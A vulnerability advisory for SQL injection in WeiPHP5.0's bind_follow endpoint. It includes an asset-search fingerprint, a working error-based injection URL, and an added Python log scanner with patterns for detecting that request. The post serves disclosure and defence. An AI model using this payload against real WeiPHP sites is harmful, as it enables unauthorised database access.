WeiPHP5.0 bind_follow SQL injection vulnerability
Vulnerability Description
In WeiPHP5.0, every SQL query that passes controllable parameters through the wp_where() function is affected, and injection points exist in both the front end and the back end.
Vulnerability Impact
WeiPHP5.0
Network surveying and mapping
app="WeiPHP"
Vulnerability reproduction
Login page
Verification PoC
/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(%271%27),0x7e),1)--+
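Detection logic for the request above, as an added example that is not part of the original post or of WeiPHP: it scans access-log lines for bind_follow requests in which uid arrives as an array whose element 0 is the exp keyword, or in which a parameter value contains a SQL function call. The log lines, the finding labels, and the assumption that uid and publicid are normally scalar values are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumption: these parameters are meant to be scalars in bind_follow requests.
SCALAR_PARAMS = {"uid", "publicid"}
# Operator keyword seen in element 0 of the array in the page's request.
OPERATOR_KEYWORDS = {"exp"}
# SQL function calls seen in the page's request; a heuristic, not a full list.
SQL_CALL = re.compile(r"\b(updatexml|concat)\s*\(", re.IGNORECASE)
ARRAY_KEY = re.compile(r"^([^\[\]]+)\[([^\]]*)\]$")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def inspect_target(target):
    """Return sorted findings for one request target (path?query)."""
    findings = set()
    # parse_qsl percent-decodes keys and values, so uid%5B0%5D is seen as uid[0].
    for key, value in parse_qsl(target.partition("?")[2], keep_blank_values=True):
        match = ARRAY_KEY.match(key)
        if match:
            name, index = match.groups()
            if name in SCALAR_PARAMS:
                findings.add(f"array-for-scalar:{name}")
            if index == "0" and value.strip().lower() in OPERATOR_KEYWORDS:
                findings.add(f"operator-array:{name}")
        if SQL_CALL.search(value):
            findings.add(f"sql-call:{key}")
    return sorted(findings)


def scan_log(lines):
    """Return (line_number, findings) for bind_follow requests with findings."""
    hits = []
    for number, line in enumerate(lines, start=1):
        request = REQUEST_LINE.search(line)
        if request and "/bind_follow" in request.group(1):
            findings = inspect_target(request.group(1))
            if findings:
                hits.append((number, findings))
    return hits


# Constructed access-log lines; line 2 carries the request shown on this page.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid=42 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(%271%27),0x7e),1)--+ HTTP/1.1" 200 731',
]

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(number, findings)
```

The same array-for-scalar check applies as input validation in front of the query: a request in which uid is not a plain integer can be rejected before it reaches wp_where().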
This post is licensed under CC BY 4.0 by the author.